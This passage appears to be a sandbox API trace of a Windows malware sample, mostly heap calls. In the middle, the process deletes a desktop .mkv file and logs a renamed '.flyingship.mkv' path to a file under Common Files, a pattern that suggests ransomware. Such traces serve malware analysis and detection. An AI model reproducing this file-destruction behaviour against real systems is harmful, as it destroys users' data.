lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.580] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gv7qjagby9a.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0161.581] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.582] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.582] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.582] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0161.582] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.582] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.584] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.584] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.584] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0161.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.584] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.585] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.585] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.585] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.586] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", lpFilePart=0x0) returned 0x35 [0161.587] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ecd740, ftCreationTime.dwHighDateTime=0x1d5e024, ftLastAccessTime.dwLowDateTime=0x92721dc0, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x5be1480, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18b40, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gV7qJagBY9A.mkv", cAlternateFileName="GV7QJA~1.MKV")) returned 0x90af58 [0161.587] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gv7qjagby9a.mkv")) returned 1 [0161.591] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ecd740, ftCreationTime.dwHighDateTime=0x1d5e024, ftLastAccessTime.dwLowDateTime=0x92721dc0, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x5be1480, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18b40, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gV7qJagBY9A.mkv", cAlternateFileName="GV7QJA~1.MKV")) returned 0 [0161.591] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0161.591] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.591] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.591] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.591] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.592] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.592] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.592] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.592] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.592] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.592] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.592] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0161.592] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.592] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa95010 [0161.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.592] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0161.592] ReadFile (in: hFile=0x120, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87f43c*=0x692, lpOverlapped=0x0) returned 1 [0161.592] ReadFile (in: hFile=0x120, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0161.593] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x692, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.593] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa95010 | out: hHeap=0x8a0000) returned 1 [0161.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.flyingship.mkv\r\n", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0161.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa4f8 [0161.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.flyingship.mkv\r\n", cchWideChar=67, lpMultiByteStr=0x9aa4f8, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 67 [0161.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0161.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0161.593] WriteFile (in: hFile=0x120, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x42, lpOverlapped=0x0) returned 1 [0161.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0161.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.593] CloseHandle (hObject=0x120) returned 1 [0161.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa85008 | out: hHeap=0x8a0000) returned 1 [0161.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0161.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.595] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0161.595] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.596] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0161.596] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.596] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0161.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0161.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.596] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0161.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0161.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0161.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0161.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0161.597] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.598] HeapFree (in: 